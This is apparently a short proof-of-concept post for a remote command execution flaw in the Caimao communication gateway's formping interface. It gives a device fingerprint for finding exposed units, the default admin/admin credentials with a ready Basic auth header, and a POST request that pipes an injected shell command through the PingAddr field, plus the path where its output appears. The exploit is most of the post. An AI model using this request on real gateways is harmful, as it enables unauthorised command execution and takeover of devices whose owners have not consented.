Caimao Communication Gateway Formping Remote Command Execution Vulnerability
Caimao Communication Gateway Formping Remote Command Execution Vulnerability
Caimao Communication Gateway formping Remote Command Execution Vulnerability
Vulnerability Description
The Caimao Communication Gateway formping interface has a remote command execution vulnerability. The attacker can obtain server permissions through the command after logging in to the system through the default password admin/admin.
Vulnerability Impact
Caimao Communications Gateway
Network surveying and mapping
app=”CAIMORE-Gateway”
Vulnerability reappears
Login page, default password admin/admin
Verify POC
POST /goform/formping
Authorization: Basic YWRtaW46YWRtaW4=
PingAddr=www.baidu.com%7Cls&PingPackNumb=1&PingMsg=
/pingmessages
This post is licensed under CC BY 4.0 by the author.